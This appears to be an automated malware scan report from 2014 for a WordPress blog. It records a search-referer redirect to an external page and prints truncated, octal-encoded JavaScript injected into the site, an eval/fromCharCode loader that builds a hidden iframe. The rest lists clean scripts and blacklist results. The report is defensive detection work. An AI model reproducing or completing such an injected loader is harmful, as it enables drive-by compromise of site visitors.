Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.alexusstrong.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.alexusstrong.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 29 Aug 2014 12:45:19 GMT Location: http://habboigratis.altervista.org/ohmf.html?h=1453423 Server: Apache Vary: Accept-Encoding Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.alexusstrong.com/ | 200 OK Content-Length: 11321 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162, Antivirus reports:
http://www.alexusstrong.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://s.gravatar.com/js/gprofiles.js?aa&ver=3.9.2 | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.alexusstrong.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.9.2 | 200 OK Content-Length: 930 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-content/themes/fresh-and-clean/js/featured.js?ver=2012-01-10 | 200 OK Content-Length: 573 Content-Type: application/javascript | clean |
http://stats.wordpress.com/e-201435.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://www.alexusstrong.com/?p=1 | 200 OK Content-Length: 19300 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0150,0155,0164,0153,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145 ...[2097 bytes skipped]... Antivirus reports:
http://platform.linkedin.com/in.js | 200 OK Content-Length: 3690 Content-Type: text/javascript | clean |
http://www.alexusstrong.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=0.1 | 200 OK Content-Length: 8877 Content-Type: application/javascript | clean |
http://apis.google.com/js/plusone.js | 200 OK Content-Length: 12387 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.alexusstrong.com/wp-content/uploads/2012/02/Alexus_blogborder_01a.png | 200 OK Content-Length: 241310 Content-Type: image/png | clean |
http://www.alexusstrong.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.alexusstrong.com/?p=1&share=facebook | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Aug 2014 12:45:34 GMT Location: http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.alexusstrong.com%2F%3Fp%3D1&t=Alexus+Strong+-+Can+I+Make+it+to+the+WNBA%3F%3F Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.alexusstrong.com/xmlrpc.php | clean |
http://www.facebook.com/sharer.php?u=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 302 forced.302 Connection: close Date: Fri, 29 Aug 2014 12:45:36 GMT Location: https://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.alexusstrong.com%2F%3Fp%3D1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3F%3F Content-Length: 0 Content-Type: text/html; charset=utf-8 X-FB-Debug: o8DOvHjj6Y58y1RhyBCYd4lXrcV9guK65/TXLq7W2em+LJPlA52cyTQtCgLXXfkaObYHr4LqUXixqgOhsQmU/w== | clean |
https://www.facebook.com/sharer.php?u=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:36 GMT Pragma: no-cache Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8HUAVNpl4HPhl3AWYCJN-W7T; expires=Sun, 28-Aug-2016 12:45:36 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 8tLhKZyp5JzLvj3sQ757H7WTY/QwvtqXwbxE1O0yh27OuRLBKPq3v6DP/dbGn4BIHB0YqPYRjnSN/ZgcmkNktA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/sharer/sharer.php?u=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&t=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:37 GMT Pragma: no-cache Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8XUAVKMannjYbRGgvLyxYt1J; expires=Sun, 28-Aug-2016 12:45:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: F+hoJNRFwF7YWW/43DjMoXyiaBNaT3KvQJ3CziOyejmMQ7Wc8KQuSZz1HSd82+UclzrLYUswsgzHT7ht+bep4Q== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login.php?next=https%3a%2f%2fwww.facebook.com%2fsharer%2fsharer.php%3fu%3dhttp%253a%252f%252fwww.alexusstrong.com%252f%253fp%253d1%26amp%253bt%3dalexus%2bstrong%2b-%2bcan%2bi%2bmake%2bit%2bto%2bthe%2bwnba%253f%253f&display=popup | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8XUAVDIqEgnXnm1w8thZNCew; expires=Sun, 28-Aug-2016 12:45:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bdisplay%3Dpopup; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bdisplay%3Dpopup; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: MQl2dYDl3DyPm/wwgqHMNNwqnocwEYluv2+62us3P7a+K1YQTn3zgstyNkKp7md/qu9G/TOgupqVg+mdArDlGA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login.php?next=https%3a%2f%2fwww.facebook.com%2fsharer%2fsharer.php%3fu%3dhttp%253a%252f%252fwww.alexusstrong.com%252f%253fp%253d1%26amp%253bt%3dalexus%2bstrong%2b-%2bcan%2bi%2bmake%2bit%2bto%2bthe%2bwnba%253f%253f&%3bdisplay=popup&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Fri, 29 Aug 2014 12:45:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=8XUAVIxL3On8XpuEIzyy_0Hw; expires=Sun, 28-Aug-2016 12:45:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bamp%253Bdisplay%3Dpopup%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fsharer%252Fsharer.php%253Fu%253Dhttp%25253a%25252f%25252fwww.alexusstrong.com%25252f%25253fp%25253d1%2526amp%25253bt%253Dalexus%252Bstrong%252B-%252Bcan%252Bi%252Bmake%252Bit%252Bto%252Bthe%252Bwnba%25253f%25253f%26amp%253Bamp%253Bdisplay%3Dpopup%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: CFmQp6yohlLWQ+XprBZuHDbwiEkiUpy9RlOLGVdc8CejA43QL2TQQ4QlShAMBKzJdWXk4lKVYEs//vI3+8F3HA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.alexusstrong.com/?p=1&share=stumbleupon | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Aug 2014 12:45:38 GMT Location: http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.alexusstrong.com%2F%3Fp%3D1&title=Alexus+Strong+-+Can+I+Make+it+to+the+WNBA%3F%3F Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.alexusstrong.com/xmlrpc.php | clean |
http://www.stumbleupon.com/submit?url=http%3a%2f%2fwww.alexusstrong.com%2f%3fp%3d1&title=alexus+strong+-+can+i+make+it+to+the+wnba%3f%3f | HTTP/1.1 302 Redirect Connection: close Date: Fri, 29 Aug 2014 12:45:41 GMT Accept-Ranges: bytes Age: 0 Location: /submit/visitor Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ssid=I.wxvSzSpdj1c9dTIXtHr9EcTLFNnELQ; path=/; domain=.stumbleupon.com Set-Cookie: cmf_i=204821039540075f4cb3e34.82362076; expires=Sun, 28-Sep-2014 12:45:41 GMT; path=/; domain=.stumbleupon.com Set-Cookie: cmf_spr=A%2FN; expires=Sun, 28-Sep-2014 12:45:41 GMT; path=/; domain=.stumbleupon.com Set-Cookie: cmf_sp=%2Fsubmit; expires=Sun, 28-Sep-2014 12:45:41 GMT; path=/; domain=.stumbleupon.com Set-Cookie: su_c=3abef25d9a07e750aaeaaa3a9ac5ef8f%7C%7C10%7C%7C1409316340%7C59c6d94ec5d592210e49dad408bb4ae9; expires=Sat, 29-Aug-2015 12:45:41 GMT; path=/; domain=.stumbleupon.com | clean |
http://www.stumbleupon.com/submit/visitor | 200 OK Content-Length: 24545 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alexusstrong.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alexusstrong.com/
Result: alexusstrong.com is not infected or malware details are not published yet.